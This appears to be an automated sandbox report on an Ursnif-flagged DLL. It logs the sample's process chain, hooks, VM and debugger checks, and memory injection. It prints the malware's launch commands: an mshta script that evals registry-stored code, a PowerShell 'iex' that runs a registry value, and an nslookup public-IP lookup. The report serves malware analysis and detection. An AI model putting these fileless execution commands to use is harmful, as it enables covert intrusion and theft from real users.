Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E97.tmp' 'c:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D9B.tmp' 'c:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6536 -s 652
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\7849.bi1'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6740 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17420 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:82960 /prefetch:2
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E97.tmp' 'c:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D9B.tmp' 'c:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\7849.bi1'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: https___purefile24.top_4352wedfoifom.dll Static PE information: More than 200 imports for KERNEL32.dll
Source: https___purefile24.top_4352wedfoifom.dll Static PE information: More than 200 imports for USER32.dll
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.pdb source: powershell.exe, 00000018.00000002.885294750.000001D7AFBF4000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: explorer.exe, 0000001E.00000003.880827092.000000000E420000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000020.00000002.858769696.000001A77A0DC000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.pdbXP source: powershell.exe, 00000018.00000002.885632713.000001D7AFC61000.00000004.00000001.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.pdb source: powershell.exe, 00000018.00000002.885294750.000001D7AFBF4000.00000004.00000001.sdmp
Source: Binary string: sxs.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
Source: Binary string: \xa.pdb source: powershell.exe, 00000018.00000002.858473846.000001D7ABD53000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source: Binary string: CLBCatQ.pdb0t source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001E.00000000.840185909.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdbUGP source: explorer.exe, 0000001E.00000003.880827092.000000000E420000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.839861744.0000000003F10000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 0000001E.00000000.840185909.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
Source: Binary string: ole32.pdbltH5r source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb:t source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.839861744.0000000003F10000.00000004.00000001.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb(t source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000020.00000002.858769696.000001A77A0DC000.00000004.00000040.sdmp
Source: Binary string: combase.pdbk source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.pdbXP source: powershell.exe, 00000018.00000002.885294750.000001D7AFBF4000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb@tl5 source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb\tx5` source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) Jump to behavior
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline' Jump to behavior
PE file contains sections with non-standard names
Source: https___purefile24.top_4352wedfoifom.dll Static PE information: section name: .data3
Source: https___purefile24.top_4352wedfoifom.dll Static PE information: section name: .data2
Source: https___purefile24.top_4352wedfoifom.dll Static PE information: section name: .data5
Source: https___purefile24.top_4352wedfoifom.dll Static PE information: section name: .data4
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_011121B3 push ecx; ret 0_2_011121C3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01112160 push ecx; ret 0_2_01112169
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10004611 push esp; retf 0_2_10004616
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001E53 push 761D85F0h; iretd 0_2_10001E58
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10006C54 push eax; retf 0_2_10006C61
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10003666 push ecx; ret 0_2_10003667
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1007F070 push ecx; ret 0_2_1007F0AB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001277 push cs; ret 0_2_10001278
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10009AAC push ds; iretd 0_2_10009AAD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000397F push ecx; ret 0_2_100039FA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000858B push edx; iretd 0_2_10008591
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10004197 push ebp; retf 0_2_10004199
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100075A8 push edx; iretd 0_2_100075AB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100095BD push ebx; iretd 0_2_100095BE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100039E3 push ecx; ret 0_2_100039FA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002FE6 push eax; retf 0_2_100030A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1007EFE0 push edx; ret 0_2_1007F041
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0267ACE0 push ecx; ret 0_2_0267ACE9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0267B09B push ecx; ret 0_2_0267B0AB

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6752, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1007F8B0 EntryPoint,LoadIconW,CreateMenu,CloseFigure,GetDoubleClickTime,CharUpperW,GetMessageExtraInfo,OpenIcon,GetMenuItemCount,EndDoc,IsIconic,GetWindowContextHelpId,GetClipboardData,StrokePath,UnrealizeObject,GetMapMode,IsCharAlphaA,FlattenPath,EnumClipboardFormats,GetSysColorBrush,DestroyMenu,GetDCBrushColor,UpdateColors,GetColorSpace,CharNextA,GetQueueStatus,GetPolyFillMode,DestroyWindow,IsCharLowerA,SetMetaRgn,GetObjectType,EndPath,GetObjectType,IsCharAlphaW,OemKeyScan,CloseMetaFile,GetSysColorBrush,LoadCursorFromFileA,GetPixelFormat,SwapBuffers,UnrealizeObject,GetGraphicsMode,GetGraphicsMode,GetMapMode,UnrealizeObject,FlattenPath,GetMessagePos,GetTopWindow,PathToRegion,CloseWindow,GetDlgCtrlID,GetStretchBltMode,GetProcessWindowStation,CancelDC,CharLowerA,GetThreadDesktop,VkKeyScanW,CreatePatternBrush,DeleteColorSpace,IsWindowUnicode,WindowFromDC,GetKeyState,IsCharLowerA,CreateHalftonePalette,GetClipboardSequenceNumber,PathToRegion,GetMenuCheckMarkDimensions,LoadIconA,GetTextCharset (repeated many times; the call list is truncated in the report) 0_2_1007F8B0
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Stores large binary data to the registry
Source: C:\Windows\SysWOW64\WerFault.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX (4 identical entries)
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (83 identical entries)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (26 identical entries)
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX (4 identical entries)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (19 identical entries)

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2918
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6023
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\loaddll32.exe TID: 5768 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4540 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\explorer.exe TID: 3984 Thread sleep time: -3005658240s >= -30000s
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_026742B4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_026742B4
Source: explorer.exe, 0000001E.00000000.845693357.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RuntimeBroker.exe, 00000021.00000002.909095475.0000027D4C640000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.845693357.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmp Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel
Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmp Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel
Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmp Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
Source: WerFault.exe, 00000025.00000003.879906098.0000000004AD2000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmp Binary or memory string: vpci Microsoft Hyper-V Virt Kernel
Source: explorer.exe, 0000001E.00000000.838462284.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: WerFault.exe, 00000025.00000003.879906098.0000000004AD2000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWk
Source: explorer.exe, 0000001E.00000000.845870000.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RuntimeBroker.exe, 00000021.00000002.912423816.0000027D4E762000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmp Binary or memory string: storflt Microsoft Hyper-V Stor Kernel
Source: explorer.exe, 0000001E.00000000.845951984.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 0000001E.00000003.905640815.000000000DC69000.00000004.00000040.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort (2 identical entries)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_011115D2 GetLastError,NtClose,LdrInitializeThunk, 0_2_011115D2
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WerFault.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: 1050000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4FAC50000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 284AA390000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
